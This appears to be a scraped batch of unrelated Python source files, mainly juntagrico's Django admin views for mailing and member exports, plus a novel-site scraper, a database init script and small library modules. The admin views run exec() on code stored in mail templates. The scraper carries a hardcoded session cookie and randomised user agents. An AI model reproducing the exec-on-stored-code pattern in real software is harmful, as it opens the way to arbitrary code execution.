juntagrico.util.views_admin import subscription_management_list\nfrom juntagrico.util.xls import generate_excel\nfrom juntagrico.view_decorators import any_permission_required\nfrom juntagrico.views_subscription import error_page\n\n\n@permission_required('juntagrico.can_send_mails')\ndef send_email(request):\n return send_email_intern(request)\n\n\n@permission_required('juntagrico.is_depot_admin')\ndef send_email_depot(request):\n return send_email_intern(request)\n\n\n@permission_required('juntagrico.is_area_admin')\ndef send_email_area(request):\n return send_email_intern(request)\n\n\n@any_permission_required('juntagrico.is_area_admin', 'juntagrico.can_send_mails')\ndef send_email_job(request):\n return send_email_intern(request)\n\n\ndef send_email_intern(request):\n sent = 0\n if request.method != 'POST':\n raise Http404\n emails = set()\n sender = request.POST.get('sender')\n if request.POST.get('allsubscription') == 'on':\n m_emails = MemberDao.members_for_email_with_subscription().values_list('email',\n flat=True)\n emails.update(m_emails)\n if request.POST.get('allshares') == 'on':\n emails.update(MemberDao.members_for_email_with_shares(\n ).values_list('email', flat=True))\n if request.POST.get('all') == 'on':\n emails.update(MemberDao.members_for_email(\n ).values_list('email', flat=True))\n if request.POST.get('recipients'):\n emails.update(re.split(r'[\\s,;]+', request.POST.get('recipients')))\n if request.POST.get('allsingleemail'):\n emails.update(re.split(r'[\\s,;]+', request.POST.get('singleemail')))\n\n files = []\n append_attachements(request, files)\n\n if len(emails) > 0:\n formemails.internal(\n request.POST.get('subject'),\n request.POST.get('message'),\n request.POST.get('textMessage'),\n emails, files, sender=sender\n )\n sent = len(emails)\n return redirect('mail-result', numsent=sent)\n\n\n@any_permission_required('juntagrico.can_send_mails',\n 'juntagrico.is_depot_admin',\n 'juntagrico.is_area_admin')\ndef send_email_result(request, numsent):\n renderdict = {\n 'sent': numsent\n }\n return render(request, 'mail_sender_result.html', renderdict)\n\n\n@permission_required('juntagrico.can_send_mails')\ndef mails(request, mail_url='mail-send'):\n return my_mails_intern(request, mail_url)\n\n\n@permission_required('juntagrico.is_depot_admin')\ndef mails_depot(request):\n return my_mails_intern(request, 'mail-depot-send')\n\n\n@permission_required('juntagrico.is_area_admin')\ndef mails_area(request):\n return my_mails_intern(request, 'mail-area-send')\n\n\n@any_permission_required('juntagrico.is_area_admin', 'juntagrico.can_send_mails')\ndef mails_job(request):\n return my_mails_intern(request, 'mail-job-send')\n\n\ndef my_mails_intern(request, mail_url, error_message=None):\n renderdict = {\n 'recipient_type': request.POST.get('recipient_type'),\n 'recipient_type_detail': request.POST.get('recipient_type_detail'),\n 'recipients': request.POST.get('recipients'),\n 'recipients_count': int(request.POST.get('recipients_count') or 0),\n 'filter_value': request.POST.get('filter_value'),\n 'mail_subject': request.POST.get('subject'),\n 'mail_message': request.POST.get('message'),\n 'mail_url': mail_url,\n 'email': request.user.member.email,\n 'error_message': error_message,\n 'templates': MailTemplateDao.all_templates(),\n 'can_use_general_email': request.user.has_perm('juntagrico.can_use_general_email'),\n 'can_load_templates': request.user.has_perm('juntagrico.can_load_templates')\n }\n return render(request, 'mail_sender.html', 
renderdict)\n\n\n@any_permission_required('juntagrico.can_filter_members', 'juntagrico.change_member')\ndef filters_active(request):\n members = MemberDao.active_members()\n renderdict = {\n 'members': members,\n 'title': _('Alle aktiven {}').format(Config.vocabulary('member_pl'))\n }\n return render(request, 'members.html', renderdict)\n\n\n@any_permission_required('juntagrico.can_filter_members', 'juntagrico.change_member')\ndef filters(request):\n members = MemberDao.all_members()\n renderdict = {\n 'members': members,\n 'title': _('Alle {}').format(Config.vocabulary('member_pl'))\n }\n return render(request, 'members.html', renderdict)\n\n\n@permission_required('juntagrico.is_depot_admin')\ndef filters_depot(request, depot_id):\n depot = get_object_or_404(Depot, id=int(depot_id), contact=request.user.member)\n members = MemberDao.member_with_active_subscription_for_depot(depot)\n renderdict = {\n 'can_send_mails': True,\n 'members': members,\n 'mail_url': 'mail-depot',\n 'title': _('Alle aktiven {} im {} {}').format(Config.vocabulary('member_pl'), Config.vocabulary('depot'), depot.name)\n }\n return render(request, 'members.html', renderdict)\n\n\n@permission_required('juntagrico.is_area_admin')\ndef filters_area(request, area_id):\n area = get_object_or_404(ActivityArea, id=int(area_id), coordinator=request.user.member)\n members = MemberDao.members_in_area(area)\n renderdict = {\n 'can_send_mails': True,\n 'members': members,\n 'mail_url': 'mail-area',\n 'title': _('Alle aktiven {} im Tätigkeitsbereich {}').format(Config.vocabulary('member_pl'), area.name)\n }\n return render(request, 'members.html', renderdict)\n\n\n@any_permission_required('juntagrico.can_filter_subscriptions', 'juntagrico.change_subscription')\ndef subscriptions(request):\n renderdict = {\n 'subscriptions': SubscriptionDao.all_active_subscritions(),\n 'title': _('Alle aktiven {} im Überblick').format(Config.vocabulary('subscription_pl'))\n }\n\n return render(request, 'subscriptions.html', renderdict)\n\n\n@permission_required('juntagrico.is_depot_admin')\ndef filter_subscriptions_depot(request, depot_id):\n depot = get_object_or_404(Depot, id=int(depot_id))\n renderdict = {\n 'can_send_mails': True,\n 'subscriptions': SubscriptionDao.active_subscritions_by_depot(depot),\n 'mail_url': 'mail-depot',\n 'title': _('Alle aktiven {} im {} {}').format(Config.vocabulary('subscription_pl'), Config.vocabulary('depot'), depot.name)\n }\n\n return render(request, 'subscriptions.html', renderdict)\n\n\n@permission_required('juntagrico.can_view_lists')\ndef depotlist(request):\n return return_pdf_http('depotlist.pdf')\n\n\n@permission_required('juntagrico.can_view_lists')\ndef depot_overview(request):\n return return_pdf_http('depot_overview.pdf')\n\n\n@permission_required('juntagrico.can_view_lists')\ndef amount_overview(request):\n return return_pdf_http('amount_overview.pdf')\n\n\n@permission_required('juntagrico.change_subscription')\ndef future(request):\n subscriptionsizes = []\n subscription_lines = dict({})\n for subscription_size in SubscriptionSizeDao.all_sizes_ordered():\n subscriptionsizes.append(subscription_size.id)\n subscription_lines[subscription_size.id] = {\n 'name': subscription_size.product.name + '-' + subscription_size.name,\n 'future': 0,\n 'now': 0\n }\n for subscription in SubscriptionDao.all_active_subscritions():\n for subscription_size in subscriptionsizes:\n subscription_lines[subscription_size]['now'] += subscription.subscription_amount(\n subscription_size)\n\n for subscription in 
SubscriptionDao.future_subscriptions():\n for subscription_size in subscriptionsizes:\n subscription_lines[subscription_size]['future'] += subscription.subscription_amount_future(\n subscription_size)\n\n renderdict = {\n 'changed': request.GET.get('changed'),\n 'subscription_lines': iter(subscription_lines.values()),\n }\n return render(request, 'future.html', renderdict)\n\n\n@permission_required('juntagrico.can_load_templates')\ndef get_mail_template(request, template_id):\n renderdict = {}\n template = MailTemplateDao.template_by_id(template_id)\n exec(template.code)\n t = Template(template.template)\n c = Context(renderdict)\n result = t.render(c)\n return HttpResponse(result)\n\n\n@permission_required('juntagrico.can_view_exports')\ndef excel_export_members_filter(request):\n response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n response['Content-Disposition'] = 'attachment; filename=Report.xlsx'\n output = BytesIO()\n workbook = Workbook(output)\n worksheet_s = workbook.add_worksheet(Config.vocabulary('member_pl'))\n\n worksheet_s.write_string(0, 0, str(_('Name')))\n worksheet_s.write_string(0, 1, str(Config.vocabulary('assignment')))\n worksheet_s.write_string(\n 0, 2, str(Config.vocabulary('assignment') + ' ' + _('Kernbereich')))\n worksheet_s.write_string(0, 3, str(_('Taetigkeitsbereiche')))\n worksheet_s.write_string(0, 4, str(_('Depot')))\n worksheet_s.write_string(0, 5, str(_('Email')))\n worksheet_s.write_string(0, 6, str(_('Telefon')))\n worksheet_s.write_string(0, 7, str(_('Mobile')))\n members = MemberDao.members_with_assignments_count()\n\n row = 1\n for member in members:\n member.all_areas = ''\n for area in member.areas.all():\n member.all_areas = member.all_areas + area.name + ' '\n if member.all_areas == '':\n member.all_areas = str(_('-Kein Tätigkeitsbereich-'))\n\n member.depot_name = str(_('Kein Depot definiert'))\n if member.subscription_current is not None:\n member.depot_name = member.subscription_current.depot.name\n full_name = member.first_name + ' ' + member.last_name\n worksheet_s.write_string(row, 0, full_name)\n worksheet_s.write(row, 1, member.assignment_count)\n worksheet_s.write(row, 2, member.core_assignment_count)\n worksheet_s.write_string(row, 3, member.all_areas)\n worksheet_s.write_string(row, 4, member.depot_name)\n worksheet_s.write_string(row, 5, member.email)\n worksheet_s.write_string(row, 6, member.phone)\n if member.mobile_phone is not None:\n worksheet_s.write_string(row, 7, member.mobile_phone)\n row += 1\n\n workbook.close()\n xlsx_data = output.getvalue()\n response.write(xlsx_data)\n return response\n\n\n@permission_required('juntagrico.can_view_exports')\ndef excel_export_subscriptions(request):\n response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n response['Content-Disposition'] = 'attachment; filename=Report.xlsx'\n output = BytesIO()\n workbook = Workbook(output)\n worksheet_s = workbook.add_worksheet(Config.vocabulary('subscription_pl'))\n\n worksheet_s.write_string(0, 0, str(_('Übersicht')))\n worksheet_s.write_string(0, 1, str(_('HauptbezieherIn')))\n worksheet_s.write_string(0, 2, str(_('HauptbezieherInEmail')))\n worksheet_s.write_string(0, 3, str(_('HauptbezieherInTelefon')))\n worksheet_s.write_string(0, 4, str(_('HauptbezieherInMobile')))\n worksheet_s.write_string(0, 5, str(_('Weitere BezieherInnen')))\n worksheet_s.write_string(0, 6, str(_('Status')))\n worksheet_s.write_string(0, 7, str(_('Depot')))\n 
worksheet_s.write_string(0, 8, str(Config.vocabulary('assignment')))\n worksheet_s.write_string(0, 9, str(_('{} soll'.format(Config.vocabulary('assignment')))))\n worksheet_s.write_string(0, 10, str(_('{} status(%)'.format(Config.vocabulary('assignment')))))\n worksheet_s.write_string(0, 11, str(_('{} Kernbereich'.format(Config.vocabulary('assignment')))))\n worksheet_s.write_string(0, 12, str(_('{} Kernbereich soll'.format(Config.vocabulary('assignment')))))\n worksheet_s.write_string(0, 13, str(_('{} Kernbereich status(%)'.format(Config.vocabulary('assignment')))))\n worksheet_s.write_string(0, 14, str(_('Preis')))\n\n subs = subscriptions_with_assignments(SubscriptionDao.all_subscritions())\n\n row = 1\n for sub in subs:\n primary_member = sub['subscription'].primary_member\n if primary_member is not None:\n name = primary_member.get_name()\n email = primary_member.email\n phone = primary_member.phone or ''\n mobile = primary_member.mobile_phone or ''\n else:\n name = ''\n email = ''\n phone = ''\n mobile = ''\n\n worksheet_s.write_string(row, 0, sub['subscription'].size)\n worksheet_s.write_string(row, 1, name)\n worksheet_s.write_string(row, 2, email)\n worksheet_s.write_string(row, 3, phone)\n worksheet_s.write_string(row, 4, mobile)\n worksheet_s.write_string(row, 5, sub['subscription'].other_recipients_names)\n worksheet_s.write_string(row, 6, sub['subscription'].state_text)\n worksheet_s.write_string(row, 7, sub['subscription'].depot.name)\n worksheet_s.write(row, 8, sub.get('assignments'))\n worksheet_s.write(row, 9, sub['subscription'].required_assignments)\n worksheet_s.write(row, 10, sub.get('assignments_progress'))\n worksheet_s.write(row, 11, sub.get('core_assignments'))\n worksheet_s.write(row, 12, sub['subscription'].required_core_assignments)\n worksheet_s.write(row, 13, sub.get('core_assignments_progress'))\n worksheet_s.write(row, 14, sub['subscription'].price)\n row += 1\n\n workbook.close()\n xlsx_data = output.getvalue()\n response.write(xlsx_data)\n return response\n\n\n@permission_required('juntagrico.can_view_exports')\ndef excel_export_members(request):\n fields = [\n 'first_name',\n 'last_name',\n 'email',\n 'addr_street',\n 'addr_zipcode',\n 'addr_location',\n 'birthday',\n 'phone',\n 'mobile_phone',\n 'confirmed',\n 'reachable_by_email',\n 'deactivation_date',\n ]\n return generate_excel(fields, Member)\n\n\n@permission_required('juntagrico.can_view_exports')\ndef excel_export_shares(request):\n fields = [\n 'id',\n 'number',\n 'paid_date',\n 'issue_date',\n 'booking_date',\n 'cancelled_date',\n 'termination_date',\n 'payback_date',\n 'notes',\n 'member.first_name',\n 'member.last_name',\n 'member.email',\n ]\n return generate_excel(fields, Share)\n\n\n@permission_required('juntagrico.can_view_exports')\ndef export(request):\n return render(request, 'export.html', {})\n\n\n@permission_required('juntagrico.change_subscription')\ndef waitinglist(request):\n render_dict = get_changedate(request)\n return subscription_management_list(SubscriptionDao.not_started_subscriptions(), render_dict,\n 'management_lists/waitinglist.html', request)\n\n\n@permission_required('juntagrico.change_subscription')\ndef canceledlist(request):\n render_dict = get_changedate(request)\n return subscription_management_list(SubscriptionDao.canceled_subscriptions(), render_dict,\n 'management_lists/canceledlist.html', request)\n\n\n@permission_required('juntagrico.change_subscriptionpart')\ndef part_waitinglist(request):\n render_dict = get_changedate(request)\n changedlist = 
SubscriptionPartDao.waiting_parts_for_active_subscriptions()\n return subscription_management_list(changedlist, render_dict, 'management_lists/part_waitinglist.html', request)\n\n\n@permission_required('juntagrico.change_subscriptionpart')\ndef part_canceledlist(request):\n render_dict = get_changedate(request)\n changedlist = SubscriptionPartDao.canceled_parts_for_active_subscriptions()\n return subscription_management_list(changedlist, render_dict, 'management_lists/part_canceledlist.html', request)\n\n\n@permission_required('juntagrico.change_subscriptionpart')\ndef extra_waitinglist(request):\n render_dict = get_changedate(request)\n return subscription_management_list(SubscriptionPartDao.waiting_extra_subs(), render_dict,\n 'management_lists/extra_waitinglist.html', request)\n\n\n@permission_required('juntagrico.change_subscriptionpart')\ndef extra_canceledlist(request):\n render_dict = get_changedate(request)\n return subscription_management_list(SubscriptionPartDao.canceled_extra_subs(), render_dict,\n 'management_lists/extra_canceledlist.html', request)\n\n\n@permission_required('juntagrico.change_share')\ndef share_canceledlist(request):\n render_dict = {'change_date_disabled': True}\n return subscription_management_list(ShareDao.canceled_shares(), render_dict,\n 'management_lists/share_canceledlist.html', request)\n\n\n@permission_required('juntagrico.change_member')\ndef member_canceledlist(request):\n render_dict = {'change_date_disabled': True}\n return subscription_management_list(MemberDao.canceled_members(), render_dict,\n 'management_lists/member_canceledlist.html', request)\n\n\n@permission_required('juntagrico.change_member')\ndef deactivate_member(request, member_id):\n member = get_object_or_404(Member, id=member_id)\n member.deactivation_date = timezone.now().date()\n member.save()\n return return_to_previous_location(request)\n\n\ndef set_change_date(request):\n if request.method != 'POST':\n raise Http404\n raw_date = request.POST.get('date')\n try:\n date = timezone.datetime.strptime(raw_date, '%m/%d/%Y').date()\n request.session['changedate'] = date\n except ValueError:\n return error_page(request, _('Bitte gib ein Datum im Format MM/TT/JJJJ ein.'))\n return return_to_previous_location(request)\n\n\ndef unset_change_date(request):\n request.session['changedate'] = None\n return return_to_previous_location(request)\n\n\n@permission_required('juntagrico.change_subscription')\ndef sub_inconsistencies(request):\n management_list = []\n for sub in SubscriptionDao.all_subscritions():\n try:\n sub.clean()\n for part in sub.parts.all():\n part.clean()\n for member in sub.subscriptionmembership_set.all():\n member.clean()\n except Exception as e:\n management_list.append({'subscription': sub, 'error': e})\n if sub.primary_member is None:\n management_list.append({'subscription': sub, 'error': _('Haubtbezieher ist nicht gesetzt')})\n render_dict = {'change_date_disabled': True,\n 'email_form_disabled': True}\n return subscription_management_list(management_list, render_dict,\n 'management_lists/inconsistent.html', request)\n\n\n@permission_required('juntagrico.change_assignment')\ndef assignments(request):\n management_list = subscriptions_with_assignments(SubscriptionDao.all_active_subscritions())\n render_dict = {'change_date_disabled': True}\n return subscription_management_list(management_list, render_dict,\n 'management_lists/assignments.html', request)\n\n\n@login_required\ndef versions(request):\n versions = {'juntagrico': version}\n 
versions.update(addons.config.get_versions())\n    render_dict = {'versions': versions}\n    return render(request, 'versions.html', render_dict)\n","repo_name":"juntagrico/juntagrico","sub_path":"juntagrico/views_admin.py","file_name":"views_admin.py","file_ext":"py","file_size_in_byte":20719,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"61"}
{"seq_id":"23567274574","text":"import requests\nimport re\nfrom requests_html import UserAgent\nimport parsel\nimport os\nimport pandas as pd\nimport threading\nfrom tqdm import tqdm  # progress bar\n\n\n# Send the request\ndef get_response(html_url):\n    ua = UserAgent().random\n    response = requests.get(url=html_url, headers={'user-agent' : ua})\n    response.encoding = response.apparent_encoding\n    return response\n\n# Get the URL of every chapter of the novel\ndef get_novel_url(html_url):\n    response = get_response(html_url)\n    selector = parsel.Selector(response.text)\n    # The first 9 entries are recommended chapters, which we don't need\n    href = selector.css('#list dd a::attr(href)').getall()[9:]\n    # href.reverse()\n    novel_urls = []\n    for url in href:\n        novel_url = 'http://www.biqugse.com' + url \n        novel_urls.append(novel_url)\n    return novel_urls\n\n\n# Fetch the chapter text and save it\ndef get_novel_content_and_save(name, novel_url): \n    response = get_response(novel_url)\n    selector = parsel.Selector(response.text)\n    title = re.findall('<h1>(.*?)</h1>', response.text)[0]\n    # print(title)\n    content_list = selector.css('#content::text').getall()\n    content = '\\n'.join(content_list)\n    path = os.path.dirname(__file__)\n    with open(path + '\\\\' + name + '.txt', mode='a', encoding='utf-8') as f:\n        f.write(title)\n        f.write('\\n')\n        f.writelines(content)\n        f.write('\\n\\n')
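# [Editor's note] Pulling the chapter title out of raw HTML with a regex is fragile;
# since a parsel.Selector is already built right above, the same value can be read with
# a CSS query. A small alternative sketch (it assumes the page really keeps the title
# in an <h1>, as the regex does):
import parsel

html = '<div class="bookname"><h1>Chapter 1</h1></div>'
selector = parsel.Selector(html)
print(selector.css('h1::text').get())  # Chapter 1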
\n\n\n# Search feature\ndef search(book_name):\n    lis = []\n    ua = UserAgent().random\n    data = {'key': book_name}\n    # Cookies = input('Enter cookies')\n    header = {\n        'user-agent' : ua,\n        'Cookie': 'obj=1; 796ab53acf966fbacf8f078ecd10a9ce=a%3A1%3A%7Bi%3A28801%3Bs%3A24%3A%2251387311%7C%2A%7C%E7%AC%AC1%E7%AB%A0%E7%A7%9F%E6%88%BF%22%3B%7D; PHPSESSID=kigrt4hfuvmpvs08iopmjn1er1; eee124c39a6d9bc42108981154c5ab0c=1; Hm_lvt_7a41ef5a4df2b47849f9945ac428a3df=1668612958,1668671534,1668769884,1668935895; Hm_lpvt_7a41ef5a4df2b47849f9945ac428a3df=1668935898'\n    }\n    response = requests.post(url='http://www.biqugse.com/case.php?m=search', headers=header, data=data)\n    response.encoding = response.apparent_encoding\n    selector = parsel.Selector(response.text)  # convert to a Selector object for css queries\n    books_allinformation = selector.css('#newscontent div.l ul li').getall()  # book entries in the results\n    # iterate over the entries and collect them\n    if books_allinformation:\n        for book_information in books_allinformation:\n            # convert the string back into a Selector object\n            book_information = parsel.Selector(book_information) \n            novel_name = book_information.css('span.s2 a::text').get()\n            novel_id = book_information.css('span.s2 a::attr(href)').get().replace('/', '')\n            author = book_information.css('span.s4::text').get()\n            dit = {\n                'title': novel_name,\n                'author': author,\n                'book_id': novel_id\n            } \n            lis.append(dit) \n        print(f'Found {len(lis)} books')\n        search_result = pd.DataFrame(lis)\n        print(search_result) \n        num = input('Enter the number of the novel to download:\\n') \n        num_id = lis[int(num)]['book_id']\n        book_url = 'http://www.biqugse.com/' + num_id + '/'\n        # print(book_url)\n        return book_url\n    else:\n        print('No books found!\\n')
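# [Editor's note] Each chapter download above opens a fresh connection through
# requests.get; reusing a single requests.Session keeps the TCP connection and headers
# alive across thousands of chapter requests. A minimal sketch, not the record's own
# code:
import requests

session = requests.Session()
session.headers.update({'user-agent': 'Mozilla/5.0'})

def get_response_with_session(html_url):
    response = session.get(html_url)
    response.encoding = response.apparent_encoding
    return response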
\n\n\ndef main():\n    while True:\n        print(\"Enter '0' to quit\\n\")\n        book_name = input('Enter a book title:\\n')\n        if book_name == '0':\n            break\n        book_url = search(book_name)\n        if book_url is None:\n            continue\n        response = get_response(book_url)\n        book_name = re.findall('<h1>(.*?)</h1>', response.text)[0]\n        # print(book_name)\n        href = get_novel_url(book_url)\n        # if the novel file already exists, delete it first\n        path = os.path.dirname(__file__)\n        if os.path.exists(path + '\\\\' + book_name + '.txt'):\n            os.remove(path + '\\\\' + book_name + '.txt')\n        for index in tqdm(href):\n            get_novel_content_and_save(name=book_name, novel_url=index)\n            # time.sleep(0.1)\n        print(f'{book_name} has finished downloading')\n\nif __name__ =='__main__':\n    main()","repo_name":"dandan4188/web_crawler","sub_path":"Get_book_1.0.py","file_name":"Get_book_1.0.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"36357748380","text":"import sqlite3\n\nSQL_SCHEME_FILE = 'schema.sql'\n\nDEVICE_TITLES = ['main power', 'NOX', 'O2', 'alarm', 'beacon', 'ignite']\nACTIVATIONS = [0] * len(DEVICE_TITLES)\nCHANNELS = list(range(1, len(DEVICE_TITLES) + 1))\n\ndeviceStartData = zip(DEVICE_TITLES, CHANNELS)\noutputsStartData = zip(CHANNELS, ACTIVATIONS)\n\n# connection matrix for the device tree\ngraphStartData = [ [0,0,0,0,1,0],\n                   [0,0,0,0,0,0],\n                   [0,1,0,0,0,0],\n                   [0,0,1,0,0,1],\n                   [0,0,0,1,0,0],\n                   [0,0,0,0,0,0]]\n\nWARNING = \"\"\"RUNNING THIS SCRIPT WILL DELETE ANY DEVICES THAT HAVE BEEN ADDED AND RESET CHANNELS TO A DEFAULT STATE.\n- Type \"reset\" to reset the database \n- or type anything else to stop.\n\"\"\"\n\nanswer = input(WARNING)\nprint(answer)\nshouldContinue = answer.strip().lower() == \"reset\"\n\nif shouldContinue:\n    print(\"resetting...\")\n    conn = sqlite3.connect('database.db')\n    conn.row_factory = sqlite3.Row #python dicts\n\n    with open(SQL_SCHEME_FILE) as f:\n        conn.executescript(f.read())\n\n    cur = conn.cursor()\n\n    cur.executemany(\"INSERT INTO devices (title, channel) VALUES (?, ?)\", deviceStartData)\n    cur.executemany(\"INSERT INTO outputs (channel, activation) VALUES (?, ?)\", outputsStartData)\n\n# columns\n    cur.execute(\"SELECT id from devices\")\n    deviceIDs = [row['id'] for row in cur.fetchall()]\n    for deviceID in deviceIDs:\n        cur.execute(f\"ALTER TABLE graph ADD COLUMN '{deviceID}' INTEGER DEFAULT 0 NOT NULL\")\n\n    cur.executemany(\"INSERT INTO graph VALUES(?,?,?,?,?,?,?)\", [[a] + b for a,b in zip(deviceIDs, graphStartData)])\n\n    conn.commit()\n    conn.close()\nelse:\n    print(\"stopping.\")","repo_name":"Jamesalambert/control_board","sub_path":"init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"9579586618","text":"# -*-coding:utf-8-*-\r\n# @author: Yiqin Qiu\r\n# @email: barryxxz@stu.hqu.edu.cn\r\n\r\nfrom tensorflow.keras.layers import *\r\nimport tensorflow.keras.backend as K\r\n\r\n\r\nclass OurLayer(Layer):\r\n    def reuse(self, layer, *args, **kwargs):\r\n        if not layer.built:\r\n            if len(args) > 0:\r\n                inputs = args[0]\r\n            else:\r\n                inputs = kwargs['inputs']\r\n            if isinstance(inputs, list):\r\n                input_shape = [K.int_shape(x) for x in inputs]\r\n            else:\r\n                input_shape = K.int_shape(inputs)\r\n            layer.build(input_shape)\r\n        outputs = layer.call(*args, **kwargs)\r\n        for w in layer.trainable_weights:\r\n            if w not in self.trainable_weights:\r\n                self.trainable_weights.append(w)\r\n        for w in layer.non_trainable_weights:\r\n            if w not in self.non_trainable_weights:\r\n                self.non_trainable_weights.append(w)\r\n        for u in layer.updates:\r\n            if not hasattr(self, '_updates'):\r\n                self._updates = []\r\n            if u not in self._updates:\r\n                self._updates.append(u)\r\n        return outputs\r\n\r\n\r\nclass 
TrainablePositionEmbedding(OurLayer):\r\n def __init__(self, maxlen, v_dim, merge_mode='add', **kwargs):\r\n super(TrainablePositionEmbedding, self).__init__(**kwargs)\r\n self.maxlen = maxlen\r\n self.v_dim = v_dim\r\n self.merge_mode = merge_mode\r\n\r\n def build(self, input_shape):\r\n super(TrainablePositionEmbedding, self).build(input_shape)\r\n self.embeddings = self.add_weight(\r\n name='embeddings',\r\n shape=(self.maxlen, self.v_dim),\r\n initializer='zeros'\r\n )\r\n\r\n def call(self, inputs):\r\n if isinstance(inputs, list):\r\n x, r = inputs\r\n else:\r\n x, r = inputs, 0\r\n pid = K.arange(start=0, stop=K.shape(x)[1])\r\n pid = K.expand_dims(pid, 0)\r\n pid = K.tile(pid, [K.shape(x)[0], 1])\r\n pid = K.abs(pid - K.cast(r, 'int32'))\r\n pv = K.gather(self.embeddings, pid)\r\n if self.merge_mode == 'add':\r\n return pv + x\r\n else:\r\n return K.concatenate([x, pv])\r\n\r\n def compute_output_shape(self, input_shape):\r\n if self.merge_mode == 'add':\r\n return input_shape\r\n else:\r\n return (input_shape[0], input_shape[1], input_shape[2] + self.v_dim)\r\n","repo_name":"BarryxxZ/SepSteNetwithDPES","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"20128020678","text":"#!/usr/bin/env python3\n\"\"\"\n[GRM] Complex example of multiple subplots and series\n\"\"\"\nimport sys\nimport numpy as np\nimport grm\n\nx = np.linspace(-1, 1, 40)[:, np.newaxis, np.newaxis]\ny = np.linspace(-1, 1, 40)[np.newaxis, :, np.newaxis]\nz = np.linspace(-1, 1, 40)[np.newaxis, np.newaxis, :]\nv = 1 - ((x - 0.5) ** 2 + y ** 2 + z ** 2) ** 0.5\nv2 = 1 - ((x + 0.5) ** 2 + y ** 2 + z ** 2) ** 0.5\nv3 = np.zeros((40, 40, 40))\nv4 = np.zeros((40, 40, 40))\nv5 = np.zeros((40, 40, 40))\nv3[0, :, :] = 1\nv4[:, 0, :] = 1\nv5[:, :, 0] = 1\ngrm.plot.plot(\n grm.args.new(\n {\n \"subplots\": [\n {\n \"x\": np.linspace(0, 2, 100),\n \"y\": np.sin(np.linspace(0, 2, 100)),\n \"title\": \"Plot of sin from y = 0 to 2\",\n \"subplot\": [0, 1, 0.5, 1],\n },\n {\n \"series\": [\n {\"c\": v3, \"isovalue\": 0.5, \"foreground_color\": [0.8, 0.3, 0.2]},\n {\"c\": v4, \"isovalue\": 0.5, \"foreground_color\": [0.2, 0.8, 0.3]},\n {\"c\": v5, \"isovalue\": 0.5, \"foreground_color\": [0.6, 0.3, 0.8]},\n {\"c\": v2, \"isovalue\": 0.5, \"foreground_color\": [0.2, 0.8, 0.3]},\n {\"c\": v, \"isovalue\": 0.5, \"foreground_color\": [0.2, 0.3, 0.8]},\n ],\n \"kind\": \"isosurface\",\n # \"rotation\": 30.0,\n \"title\": \"Example of multi-series Isosurface\",\n \"subplot\": [0, 0.5, 0, 0.5],\n },\n {\n \"c\": np.maximum(v, v2),\n \"isovalue\": 0.5,\n \"foreground_color\": [0.2, 0.5, 0.3],\n \"title\": \"Single series isosurface\",\n \"subplot\": [0.5, 1, 0, 0.5],\n \"kind\": \"isosurface\",\n },\n ],\n \"size\": [1000, 800],\n }\n )\n)\n\nprint(\"press enter to quit\")\nsys.stdin.read(1)\n","repo_name":"sciapp/python-gr","sub_path":"examples/grm/isovalue-multiseries-multiplot.py","file_name":"isovalue-multiseries-multiplot.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"61"} +{"seq_id":"11857978890","text":"# -*- coding: utf-8 -*-\nimport datetime\nfrom peewee import PrimaryKeyField, CharField, DateTimeField, IntegerField, ForeignKeyField\nfrom base.base_module import BaseModel\n\nclass FunctionRightType(BaseModel):\n class Meta:\n db_table = 'ios_base_fucntion_right_type'\n\n type_id = 
PrimaryKeyField()\n    name = CharField()\n    icon = CharField()\n    index = IntegerField(default=0)\n    status = IntegerField(default=1)\n    gen_time = DateTimeField(default=datetime.datetime.now)\n\nclass FunctionRight(BaseModel):\n    class Meta:\n        db_table = 'ios_base_function_right'\n\n    function_right_id = PrimaryKeyField()  # function-right ID\n    name = CharField()  # function-right name\n    path = CharField()  # function path\n    status = IntegerField(default=1)  # status: 0 = inactive, 1 = active\n    description = CharField(null=True)  # description of the function right\n    gen_time = DateTimeField(default=datetime.datetime.now)  # creation time\n    icon = CharField()  # icon\n    index = IntegerField()  # results are sorted by index ascending when fetched\n\n    type = ForeignKeyField(FunctionRightType)\n\n\n","repo_name":"guoshengkang/demand-forcast","sub_path":"cdf_v2/model/base/function_right.py","file_name":"function_right.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
{"seq_id":"72985186433","text":"import grok\nimport zope.component\n\n#from uvcsite.browser.widgets import UvcRadioFieldWidget, UvcMultiChoiceFieldWidget\nfrom uvc.adhoc.utils import AdHocIdReference\nfrom zope.component.interfaces import IComponents\nfrom uvc.adhoc.auth.handler import AdHocAuthenticator\nfrom zope.pluggableauth import PluggableAuthentication\nfrom grokcore.registries import create_components_registry\nfrom uvc.adhoc.interfaces import IAdHocApplication, IAdHocIdReference\nfrom zope.pluggableauth.interfaces import IAuthenticatorPlugin\nfrom zope.authentication.interfaces import IAuthentication\nfrom zeam.form.ztk import customize\nfrom zope.schema.interfaces import IDate\nfrom zeam.form.ztk.widgets.choice import ChoiceField\nfrom .interfaces import IAdHocLayer\nfrom zope.interface import Interface\n\n\nadhocRegistry = create_components_registry(\n    name=\"adhocRegistry\",\n    bases=(zope.component.globalSiteManager, ),\n)\n\n\ngrok.global_utility(\n    adhocRegistry,\n    name=\"adhocRegistry\",\n    provides=IComponents,\n    direct=True,\n)\n\n\ndef setup_pau(PAU):\n    PAU.authenticatorPlugins = ('principals', )\n    PAU.credentialsPlugins = (
